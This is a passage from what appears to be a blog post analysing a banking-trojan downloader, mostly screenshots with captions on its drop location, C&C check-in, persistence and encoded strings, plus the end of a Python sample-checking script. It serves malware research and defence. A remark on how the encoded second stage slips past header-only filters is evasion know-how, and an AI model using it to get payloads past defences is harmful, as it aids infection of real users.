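def verdicts() -> Dict[str, str]:
    return {name: inspect_download(name, data)["verdict"] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in verdicts().items():
        print(f"{name}: {verdict}")
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The encoded second stage is the interesting case: it is neither a ZIP nor a PE, so a filter that only blocks MZ headers lets it through, while a filter that requires a .zip to actually start with a ZIP header stops it before the downloader ever gets to decode it.</span></div>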
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZANrou9a6B44R_QhF05UD03ueuMrbUd8JyoCK6ihQpRTGNvLpN1zQQeJoOocPc9P8kxvwxoPox693g7glRP7jIbQIKF_5k7hzZX51YmicRUA4nruwKt7zTnJTyo4ZTfj5MkIFnQ8dI9A/s1600/08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZANrou9a6B44R_QhF05UD03ueuMrbUd8JyoCK6ihQpRTGNvLpN1zQQeJoOocPc9P8kxvwxoPox693g7glRP7jIbQIKF_5k7hzZX51YmicRUA4nruwKt7zTnJTyo4ZTfj5MkIFnQ8dI9A/s1600/08.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb5mFDDbRKOYT7dfSoFeUcY20kqPnPmMD2YC5MHP-Tev-E9fqVPa2stgA5laZt3iyfIzSM0lLRXIh3hV68pISH7mOlgIr9ue6dUawaa9vi4_P7T_X7kKgOdivjnxQEhCywU2j7U9DjAEs/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="6" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb5mFDDbRKOYT7dfSoFeUcY20kqPnPmMD2YC5MHP-Tev-E9fqVPa2stgA5laZt3iyfIzSM0lLRXIh3hV68pISH7mOlgIr9ue6dUawaa9vi4_P7T_X7kKgOdivjnxQEhCywU2j7U9DjAEs/s320/09.jpg" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Location on the system where the file is written before being executed.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjENIwLabgJzrBnjdlrLxDsy3jezPPy36FUOd1r7EwOMkOYQUfXWfM8mVemp5hD8l3OHTAObvLNdq8PeDGjyJBPJlReeRfreOUlKsA6CATnrK-U9LzblcoXEGwSiPoh5LtZvk_04kU4sK8/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjENIwLabgJzrBnjdlrLxDsy3jezPPy36FUOd1r7EwOMkOYQUfXWfM8mVemp5hD8l3OHTAObvLNdq8PeDGjyJBPJlReeRfreOUlKsA6CATnrK-U9LzblcoXEGwSiPoh5LtZvk_04kU4sK8/s1600/10.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinoKxvBg8XuKg7i-YhvnajYGtBuAdt4IIvF8M22CFrlfmaUcjBdJAT7YjA0zfVw9gFwHIbzhUpIldVdQaK88fcJZUw5YaIrm1KR-URix_V0EHkOkfmzSNtFpQFggtHIQwCjKs9vlJSVdw/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinoKxvBg8XuKg7i-YhvnajYGtBuAdt4IIvF8M22CFrlfmaUcjBdJAT7YjA0zfVw9gFwHIbzhUpIldVdQaK88fcJZUw5YaIrm1KR-URix_V0EHkOkfmzSNtFpQFggtHIQwCjKs9vlJSVdw/s1600/11.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOlurnC3jOHHmZYVNWgTR0R-5bYVL6ZOTPADMqtyc7gGJn0PJdBhMZdumSdfS7J19O6EYjyqf3xuC5PwXqgEZRq0xrYg7-tUQAdUvAdzq216mVE7SdRmeaIrSMZc18vvtSx8xffC0bob0/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOlurnC3jOHHmZYVNWgTR0R-5bYVL6ZOTPADMqtyc7gGJn0PJdBhMZdumSdfS7J19O6EYjyqf3xuC5PwXqgEZRq0xrYg7-tUQAdUvAdzq216mVE7SdRmeaIrSMZc18vvtSx8xffC0bob0/s1600/06.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrCipas03Si_4aPvB70Px7zUCyMYfGnszieGgDs6q_RpJOMJGks7De50FwR72HDDB0sMP6nrsMgLAw2t_Dq8DQPS3mu8UH6fvejGRFIDITpt_9OwzFAqz4bVCFUAMYYKonezzBXSgSJ1M/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrCipas03Si_4aPvB70Px7zUCyMYfGnszieGgDs6q_RpJOMJGks7De50FwR72HDDB0sMP6nrsMgLAw2t_Dq8DQPS3mu8UH6fvejGRFIDITpt_9OwzFAqz4bVCFUAMYYKonezzBXSgSJ1M/s640/15.jpg" width="640" /></a></div>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Call to the C&amp;C to report the infection.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kj1eRbtJwQaOMVbuffLKVGXOyTmouhzNKCkfhYrOxiOkZDXZTA15lhxKeDWF6ma8q4LAu6v1YSF8P7G1PZBLNbIzel0T9FiZs2xveBs0RHAiYLbXiWJiZfl4n66voauguDrxyNnf07M/s1600/13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="627" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kj1eRbtJwQaOMVbuffLKVGXOyTmouhzNKCkfhYrOxiOkZDXZTA15lhxKeDWF6ma8q4LAu6v1YSF8P7G1PZBLNbIzel0T9FiZs2xveBs0RHAiYLbXiWJiZfl4n66voauguDrxyNnf07M/s640/13.jpg" width="640" /></a></div>
<br />
<br />
<br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Analysis of the Payload</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">As we can see, the file is rather large: 114 MB.</span><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3frcIDQrA5y9JS_ZySH1p4zUXO4e0rLUaDnIHmkPIQ-0CSC5CGZ0QIavEYxDRzt8aieAX7y5iFu4Pqjf8WC3SwX0SjVAQnSjeeMbcvPsAJhGa9zVCGJu3HPxTT2CgCdSMfLb9A83Ihg8/s1600/icono2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3frcIDQrA5y9JS_ZySH1p4zUXO4e0rLUaDnIHmkPIQ-0CSC5CGZ0QIavEYxDRzt8aieAX7y5iFu4Pqjf8WC3SwX0SjVAQnSjeeMbcvPsAJhGa9zVCGJu3HPxTT2CgCdSMfLb9A83Ihg8/s320/icono2.jpg" width="269" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxLW5-68vXyu0lamjSr_yXIMr7PZ9cYaSplCA3T_isS63fR64k7AujI15H9-UhK5T92VRmak83rmpiARM7l8vTqL6VT_A6Bt0Wmi-c_zgDm5ELQ5jjg80D322m7t1EHAzDp7YWY_M4KQ/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxLW5-68vXyu0lamjSr_yXIMr7PZ9cYaSplCA3T_isS63fR64k7AujI15H9-UhK5T92VRmak83rmpiARM7l8vTqL6VT_A6Bt0Wmi-c_zgDm5ELQ5jjg80D322m7t1EHAzDp7YWY_M4KQ/s640/vt2.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://virustotal.com/es/file/63e335b50467c00bd6dec465f3c5de4c6d5c427a593247a38709d6588cb50a5a/analysis/1490982253/</span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Persistence on the system</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDhQUmc1lapg24RovPKHmy94lpwxA82B3oxpz1jFK1T8h1YWCb1LzeIeb9g3o9rikkg6G1hH8fyPWxz6xDbNugVu6sQ7Aa1FVPbeCVt44sujUqEmyNg8s8_qxI5rnM6EMFDZVYXkFZU0/s1600/startup.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDhQUmc1lapg24RovPKHmy94lpwxA82B3oxpz1jFK1T8h1YWCb1LzeIeb9g3o9rikkg6G1hH8fyPWxz6xDbNugVu6sQ7Aa1FVPbeCVt44sujUqEmyNg8s8_qxI5rnM6EMFDZVYXkFZU0/s640/startup.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">There are encoded strings:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006833E8 <ansistring> '345AFA2ECD75DC3F9732A0'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683408 <ansistring> '45'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683414 <ansistring> '32AF24DA13B618BE1BB226B31EC60E389EF417BE1BC4001AC3035C'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683454 <ansistring> '46'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683460 <ansistring> 'BB18B56599FE'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683478 <ansistring> '47'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683484 <ansistring> 'E86EEB1CD672E266E072DC65F2256783D37AA7ED659F3953FF47'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006834C4 <ansistring> '48'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006834D0 <ansistring> '6CE16F99'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006834E4 <ansistring> '070D49E90B494F89D774'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683504 <ansistring> '49'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683510 <ansistring> '4984C16085DD68FD54BA26BE15CDCF76EF5C'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683540 <ansistring> '50'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 0068354C <ansistring> '83DD7297A922AE2AA3329E3F938084FD011731AD28D0CA0D3899'</ansistring></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">We can decode them by placing a breakpoint at the memory address where the decryption routine ends </span><span style="font-family: "arial" , "helvetica" , sans-serif;">and checking the value returned in EDX.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBojIDum6CDG7Wg374QiUltf6Wo7m_T-ioF98AFuP3i01l4q_KDg0TMnExuH9phpMdx1KHthc4ZItGxsqtlctpTjt89irDyk1ZunalLHELU2eIObBc_JU5ZJGFksAVFPZ37LN6fb1SkM/s1600/trusteer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBojIDum6CDG7Wg374QiUltf6Wo7m_T-ioF98AFuP3i01l4q_KDg0TMnExuH9phpMdx1KHthc4ZItGxsqtlctpTjt89irDyk1ZunalLHELU2eIObBc_JU5ZJGFksAVFPZ37LN6fb1SkM/s400/trusteer.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSoTK7dlYnopURCrV3zyNTYyvIm3I0ZEVZhrDer6mtq4e11U3qtfVZMjtMLTf8Cfi8Mp35xwCgFlKa61gOkCcbLF0XhY9dCUO5EwIIpk-SHqE3qPeUbpzEr8yt2vZUKcYVjQBOjX37p88/s1600/bk02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSoTK7dlYnopURCrV3zyNTYyvIm3I0ZEVZhrDer6mtq4e11U3qtfVZMjtMLTf8Cfi8Mp35xwCgFlKa61gOkCcbLF0XhY9dCUO5EwIIpk-SHqE3qPeUbpzEr8yt2vZUKcYVjQBOjX37p88/s1600/bk02.jpg" /></a><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Note: the encoding and decoding routine was explained in previous posts on this blog.</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT_YXc4AkuTK9VLi_Jp71_siEY9-4za6rTSpC41YKuQD1foX-0xJkBGNpQBng-d1Q3XrR5lClxEGXZSJASjtr6ZMyNqZurAcsMnz9kbhiednAztiR5AfJ9AYiWmxOGEkk21GLiq4ghigk/s1600/AVAST.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT_YXc4AkuTK9VLi_Jp71_siEY9-4za6rTSpC41YKuQD1foX-0xJkBGNpQBng-d1Q3XrR5lClxEGXZSJASjtr6ZMyNqZurAcsMnz9kbhiednAztiR5AfJ9AYiWmxOGEkk21GLiq4ghigk/s400/AVAST.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif_8f6v38WM3Bzlf4kAnUbz-YSLN-FTOuDleDJ9NkAuGVbxXOhMh8bGfBp1e9mKWxjREiutuwpBEjilAzd4D52iIRo26K48bHrWPMghGYDMUh_l1zlV7OrmgZvT5nFszPGynrOiyr9A90/s1600/AVG.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="49" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif_8f6v38WM3Bzlf4kAnUbz-YSLN-FTOuDleDJ9NkAuGVbxXOhMh8bGfBp1e9mKWxjREiutuwpBEjilAzd4D52iIRo26K48bHrWPMghGYDMUh_l1zlV7OrmgZvT5nFszPGynrOiyr9A90/s400/AVG.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM2T_wE7Tpu8N0Qyz2LF-I043GXR4C3_qu3UOKdNuZQZcykTwZ4QTuDs6ZdMqItaOR1cmeEFzKAjNwFl2XWak80F15h7rsksSafsL_SibZ4rYZVA44Gcmr08scC_OyyyhvOh39zivb_N0/s1600/bk01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM2T_wE7Tpu8N0Qyz2LF-I043GXR4C3_qu3UOKdNuZQZcykTwZ4QTuDs6ZdMqItaOR1cmeEFzKAjNwFl2XWak80F15h7rsksSafsL_SibZ4rYZVA44Gcmr08scC_OyyyhvOh39zivb_N0/s400/bk01.jpg" width="400" /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtDoAL9-bEvnPcwDaoF6dm2ab1R5hyphenhyphen_sl3y1oE9IVUxUOKZPsqL-NQl94m69P3o-KBokG_S-d5qnG0jwE6Co9Y4x18Xjg1QVlJAltJEp4Ado8_1LeHRFiqszlXlQ0q4I0LfB3IlOmXBxo/s1600/bk03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtDoAL9-bEvnPcwDaoF6dm2ab1R5hyphenhyphen_sl3y1oE9IVUxUOKZPsqL-NQl94m69P3o-KBokG_S-d5qnG0jwE6Co9Y4x18Xjg1QVlJAltJEp4Ado8_1LeHRFiqszlXlQ0q4I0LfB3IlOmXBxo/s400/bk03.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5j0SRwx_mFgbTiNgmnMDEsfpeySLKWp8ZrYWaewCScySuA3nwJMKdL4wDtamiWksTGHwOCf_Clf5d7ij6Lej-pHR9T7GxbT4syTaYWfl3nEBQ2ZY43GEOtxlF5shjB6-L5T7whnxQwV8/s1600/bk04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5j0SRwx_mFgbTiNgmnMDEsfpeySLKWp8ZrYWaewCScySuA3nwJMKdL4wDtamiWksTGHwOCf_Clf5d7ij6Lej-pHR9T7GxbT4syTaYWfl3nEBQ2ZY43GEOtxlF5shjB6-L5T7whnxQwV8/s400/bk04.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVKnYlnxH232qEYLPlVOWrcs4X0Q2ZksBgW5tBjp5H83DWFlJN_CO6HVqYQ-Y_TrFkM_2LKlh0sz_OJQxnAv0UvrLd-unOAcIAvvnpbv4qvEqMAa6_XyDNWbxSzLLNrI-HLW67usr8vqw/s1600/bk05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVKnYlnxH232qEYLPlVOWrcs4X0Q2ZksBgW5tBjp5H83DWFlJN_CO6HVqYQ-Y_TrFkM_2LKlh0sz_OJQxnAv0UvrLd-unOAcIAvvnpbv4qvEqMAa6_XyDNWbxSzLLNrI-HLW67usr8vqw/s400/bk05.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF5zQc_iekmiJ2Hy1nSiCmIotNu6EonkPhyavwB5o5lwIhssuy35SkpjfgxLNR3dR_VaNd_0y106zLt_dymQJgGXHDOG0kZDXrQT2WS5bID5q0J6oOoQymqrFmpmC3OUiHPCacZSE2hyphenhypheno/s1600/bk06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF5zQc_iekmiJ2Hy1nSiCmIotNu6EonkPhyavwB5o5lwIhssuy35SkpjfgxLNR3dR_VaNd_0y106zLt_dymQJgGXHDOG0kZDXrQT2WS5bID5q0J6oOoQymqrFmpmC3OUiHPCacZSE2hyphenhypheno/s400/bk06.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRAekh5XIOpibqN9C0T3eUM1fL2NjIkXeTCgYyo27AYELRyypvPSiBx0sriHtCr5eRTygYzCG8Oqt4uI3hIqNwDYdnPwbdiXhbAXKb9wiGFzyZAiE2a0cD1TOLMEeT-9Eo-lNV-6_FjMw/s1600/bk07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRAekh5XIOpibqN9C0T3eUM1fL2NjIkXeTCgYyo27AYELRyypvPSiBx0sriHtCr5eRTygYzCG8Oqt4uI3hIqNwDYdnPwbdiXhbAXKb9wiGFzyZAiE2a0cD1TOLMEeT-9Eo-lNV-6_FjMw/s400/bk07.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4WmstVMuqX9zb_yH3gkm5a4UFSC7Le7da0X87-cdYQxGBTjyjT3nTVSZBVSZIzZnGMiJVpGHFSVx99fPpNdRA9BFnLbLwS81W3BQ6VyKcCIO9K0iAl-_6nupwC7Ehe60-Bb5oKsUe_4/s1600/bk08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiy4WmstVMuqX9zb_yH3gkm5a4UFSC7Le7da0X87-cdYQxGBTjyjT3nTVSZBVSZIzZnGMiJVpGHFSVx99fPpNdRA9BFnLbLwS81W3BQ6VyKcCIO9K0iAl-_6nupwC7Ehe60-Bb5oKsUe_4/s400/bk08.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUPmoj_gdZbNiCQGW_kKsfE9TadjrglNwTkBx4d_Tc4tX0azAvZPcJL7r8YK4O0BbETTeLeQTTWQDhMspI_NydHElwqU4axQO8CCxI3s8RiErrwYwopwB6D-PEgFsah4GIL0JcGujp0jY/s1600/bk09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUPmoj_gdZbNiCQGW_kKsfE9TadjrglNwTkBx4d_Tc4tX0azAvZPcJL7r8YK4O0BbETTeLeQTTWQDhMspI_NydHElwqU4axQO8CCxI3s8RiErrwYwopwB6D-PEgFsah4GIL0JcGujp0jY/s400/bk09.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmDLf2Iw5iwmHhcA77ar2nlplGqu93mofzkvEOp2i4RvaewxDQRielGpHIbtXp4KttezxBx8IqfMfdJb2IUF0DbAYnzhCn7kmXEQNNr-hsJCcvxGGO16x9gvOVQZPeZUz2BgQoYJvbPjc/s1600/bk10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmDLf2Iw5iwmHhcA77ar2nlplGqu93mofzkvEOp2i4RvaewxDQRielGpHIbtXp4KttezxBx8IqfMfdJb2IUF0DbAYnzhCn7kmXEQNNr-hsJCcvxGGO16x9gvOVQZPeZUz2BgQoYJvbPjc/s400/bk10.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4RBVLcuztyKAqZYFkwSiDBpOhbyAibcupDm4uXdjDk5fDuyoUjYPEFADTj9aPO1nL8zMTzuMAhFnPbO_NsORMepBK1iJvsdkXSyES0v3Z3y3lu7rCnHQwf-XVnjX3rrK1W9SR8Mt41U/s1600/bk11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU4RBVLcuztyKAqZYFkwSiDBpOhbyAibcupDm4uXdjDk5fDuyoUjYPEFADTj9aPO1nL8zMTzuMAhFnPbO_NsORMepBK1iJvsdkXSyES0v3Z3y3lu7rCnHQwf-XVnjX3rrK1W9SR8Mt41U/s400/bk11.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA-QsZpN0DigpKwDneVKdseGOOeCD2kxfT-lwZ8ypdSDCGn736zbDdeqCyKwtETJZ_0JQn_1ykPACYKRW3GNNwCSkYS7oUkABhOc9fR41FEg-QuravpdBJNTPHiT3p1ZQ2vgx5AMj2gUI/s1600/bk12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA-QsZpN0DigpKwDneVKdseGOOeCD2kxfT-lwZ8ypdSDCGn736zbDdeqCyKwtETJZ_0JQn_1ykPACYKRW3GNNwCSkYS7oUkABhOc9fR41FEg-QuravpdBJNTPHiT3p1ZQ2vgx5AMj2gUI/s400/bk12.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfvuwmkiXbAm0EDgoU8o2xLJY14l4SyOtho7h6QSY6NyH3qYu9qCyogCWJdXVkTGib43e6lSuSkZPABo4xx6HRxVDhvj9rGBK4PmB0qoLevqz-mfWLkcoMFbiWWUqxYU4A8kcp_5ERvPE/s1600/bk13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfvuwmkiXbAm0EDgoU8o2xLJY14l4SyOtho7h6QSY6NyH3qYu9qCyogCWJdXVkTGib43e6lSuSkZPABo4xx6HRxVDhvj9rGBK4PmB0qoLevqz-mfWLkcoMFbiWWUqxYU4A8kcp_5ERvPE/s400/bk13.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVIMWHz_j8BLeSPCla9Yr2UGo7H-H2nYRibthTSPJffsQr2vhxFDqgt9T6C4q5p8KtpHpgtCuExwEF42x6HVGjE9MYf-yQ6JZ6BKQKk0eTDYY4VYSHfSjRbrGHkuye2FLBo0_4446-N68/s1600/bk14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVIMWHz_j8BLeSPCla9Yr2UGo7H-H2nYRibthTSPJffsQr2vhxFDqgt9T6C4q5p8KtpHpgtCuExwEF42x6HVGjE9MYf-yQ6JZ6BKQKk0eTDYY4VYSHfSjRbrGHkuye2FLBo0_4446-N68/s400/bk14.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AHakJpwSBs98MeSRZL6NrDLgXP2PQBzoAyQb_0RSOcLVEuN9GOEsXJM3RPF-RW1k67VCTuJw9L1G8dPP_gF-rgB4qEsGovRjRPz_PxWZaC5kCeA5TQ66wQ0gF4N2EeMZLJ_deas4sbY/s1600/bk15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0AHakJpwSBs98MeSRZL6NrDLgXP2PQBzoAyQb_0RSOcLVEuN9GOEsXJM3RPF-RW1k67VCTuJw9L1G8dPP_gF-rgB4qEsGovRjRPz_PxWZaC5kCeA5TQ66wQ0gF4N2EeMZLJ_deas4sbY/s400/bk15.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
